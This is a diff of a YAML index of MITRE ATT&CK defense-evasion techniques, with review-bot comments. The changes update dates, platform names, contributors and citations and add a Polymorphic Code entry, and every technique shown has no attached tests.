Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests: []
T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
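Review bot: `Azure AD`, `Office 365` and `Google Workspace` are removed from `x_mitre_platforms` and replaced by `Office Suite` and `Identity Provider`, with `x_mitre_version` going 2.6 to 2.7. Any per-platform index builder that filters on the old literal strings will silently drop T1078 from those indexes after this change, so check that the builders map the new platform names before merging; the detection and data-source text in this hunk is unchanged, so the rename is the only content change here.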
@@ -9583,11 +9668,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
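Review bot: the `Leitch Hollowing` reference swaps the original `autosectools.com` PDF for a copy hosted at `new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf` and resets the retrieval date to September 12, 2024, while the citation text still reads `Leitch, J. (n.d.)`. A mirrored upload is a weaker citation than the publisher's copy; if this is what upstream now ships it is fine to carry, but confirm the mirrored PDF is the same document, and keep the `source_name` key unchanged (it is) so existing `(Citation: Leitch Hollowing)` references in descriptions keep resolving.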
@@ -9713,7 +9798,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9735,7 +9820,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
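Review bot: the new T1027.014 entry arrives with `x_mitre_detection: ''` and `atomic_tests: []`, so the index carries no detection text and no test for it; that is expected for a technique first published under spec 3.2.0, but the PR description should state that no atomic test exists yet rather than leaving readers to wonder whether the generator failed to match one. Also, `x_mitre_platforms` is listed as Windows, macOS, Linux here, whereas the other entries in this patch list Linux, macOS, Windows; if any index builder compares platform lists as ordered sequences, normalize the order on output.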
@@ -10128,7 +10277,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
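Review bot: any index, filter or test-selection logic keyed on the `Office 365` or `Google Workspace` platform strings will now silently match nothing for T1550.004, since both are replaced by the single `Office Suite` value here (the same substitution is applied to T1656 and T1562.008 further down, and `Azure AD` becomes `Identity Provider` for T1562.008 and T1556.009). Check that per-platform index generation maps the new names before this lands, and call the rename out in the changelog; the `x_mitre_version` bump from `1.3` to `1.4` is the only other visible change in this object, so nobody will otherwise notice that the platform vocabulary changed underneath them.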
@@ -10751,9 +10889,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
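Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1218.009 without a replacement in view, whereas the other objects in this diff either keep their value or get `x_mitre_attack_spec_version: 3.2.0` added; neither this hunk nor the `modified` hunk just above adds one back. Confirm the field is present elsewhere in the object (the key may simply have moved, as it does for T1027.004 later in the diff) or explain why this technique is the one left without it.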
@@ -10990,48 +11124,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
